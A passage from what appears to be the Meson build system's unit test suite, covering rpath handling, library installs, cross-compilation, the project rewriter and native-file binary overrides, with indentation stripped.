rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.common_test_dir, '201 override with exe')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
PkgConfigDependency) works. On macOS, this workflow works out of the
box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
as LD_LIBRARY_PATH, etc, so this test is skipped.
The system library is found with cc.find_library() and pkg-config deps.
'''
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not is_osx():
# Rest of the workflow only works on macOS
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
curdir = os.getcwd()
os.chdir(subdir)
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
os.chdir(curdir)
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('62 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
# Assert that
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# C_std defined in project options must be in effect also when native compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
crossfile = tempfile.NamedTemporaryFile(mode='w')
env = {'CC': '"' + os.path.join(testdir, 'build_wrapper.py') + '"'}
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '69 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
# Test that installed libraries works
self.new_builddir()
self.prefix = oldprefix
meson_args = ['-Dc_link_args=-L{}'.format(libdir),
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '69 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BasePlatformTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
# When cross compiling "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
self.assertTrue(False, 'Option libdir not in introspect data.')
def test_std_remains(self):
# C_std defined in project options must be in effect also when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BasePlatformTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'):
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
# When specifying a known name, (python2 / python3) the module
# will also try 'python' as a fallback and use it if the major
# version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
# python2 is not necessarily installed on the test machine,
# if it is not, or the python headers can't be found, the test
# will raise MESON_SKIP_TEST, we could check beforehand what version
# of python is available, but it's a bit of a chicken and egg situation,
# as that is the job of the module, so we just ask for forgiveness rather
# than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
# Same as above, pypy2 and pypy3 are not expected to be present
# on the test system, the test project only raises in these cases
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
# The test is configured to error out with MESON_SKIP_TEST
# in case it could not find python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
# While dir is an external command on both Windows and Linux,
# it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
def test_target_source_list(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_tatrget_add(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
expected = {
'target': {
'exe1@exe': {
'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
f.write("{}='{}'\n".format(k, v))
return filename
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
chbang = '#!/bin/env python3'
else:
chbang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(chbang)))
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(' if args.{}:\n'.format(name))
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
with open(batfile, 'wt') as f:
f.write(r'@{} {} %*'.format(sys.executable, filename))
return batfile
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write("bash = '{}'\n".format(wrapper))
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
